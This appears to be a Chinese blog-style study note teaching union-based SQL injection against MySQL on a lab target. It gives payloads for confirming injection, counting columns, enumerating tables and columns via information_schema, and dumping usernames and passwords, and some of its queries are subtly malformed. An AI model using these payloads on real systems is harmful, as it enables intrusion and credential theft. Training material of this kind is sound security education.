SQL注入（一）之union注入

靶机地址：http://59.53.63.23:10772/

在SQL注入的前期，第一件事情就是找到SQL注入点，在找到注入点后开始下面的内容：

一、联合查询法（一）

a.判断注入点：

and 1=1  --返回true，显示正常
and 1=2  --返回false，显示错误

b.猜多少列

order by [数值]

c.联合查询猜表名

union select 1,2,3,……,7 from users --猜表名并记录返回回显位（报错说明表不存在，将表名更换继续猜）

d.联合查询猜列名

union select 1,2,username,4,5,password,7 --猜列名

二、联合查询法（二）

在MySQL5.0之后，MySQL会默认在数据库中存放一个"information_schema"的数据库，所有数据库及他们的表都会存放在"information_schema"这个数据库中，我们需要记住：SCHEMATA、TABLES和COLUMNS这三个表名。

1.SCHEMATA这个表中我们需要记住字段：SCHEMA_NAME，它存储了该用户创建的所有数据库库名;

2.TABLES这个表中我们需要记住字段：TABLE_SCHEMA(数据库库名)、TABLE_NAME(表名)，它存储了该用户创建的所有数据库库名和表名；

3.COLUMNS表中我们需要记住字段：TABLE_SCHEMA(库名)、TABLE_NAME(表名)、COLUMN_NAME(字段名)，它存储了该用户创建的所有数据库库名、表名和字段名。

information_schema.tables 记录表名信息
information_schema.columns 记录列名信息
TABLE_SCHEMA 数据库字段
table_name 表名 column_name 列名

需要记住的三个函数：

database()：当前网站使用的数据库
version()：当前mysql的版本
user()：当前mysql的用户

a.获取数据库库名、版本号、用户

union select 1,2,database(),version(),user(),6,7

b.得到数据库库名后查当前数据库表名

union select table_name from information_schema.tables where table_schema=database();

c.在查到的表名中查找列名，假设需要的表名为：user

union select  column_name from information_schema.columns where table_name='users';

e.查数据，假设查到的列名分别为：id，username，password

union select username,password from table_name='user';

注：笔记仅供学习交流，请勿用于违法行为，如造成后果，与笔者无关

本人小白一枚，如果各位老哥发现错误，还望指出

更多需要请关注：笔者小站：https://www.my404.cn/

笔者微信公众号（已开通网课查题功能）：城疯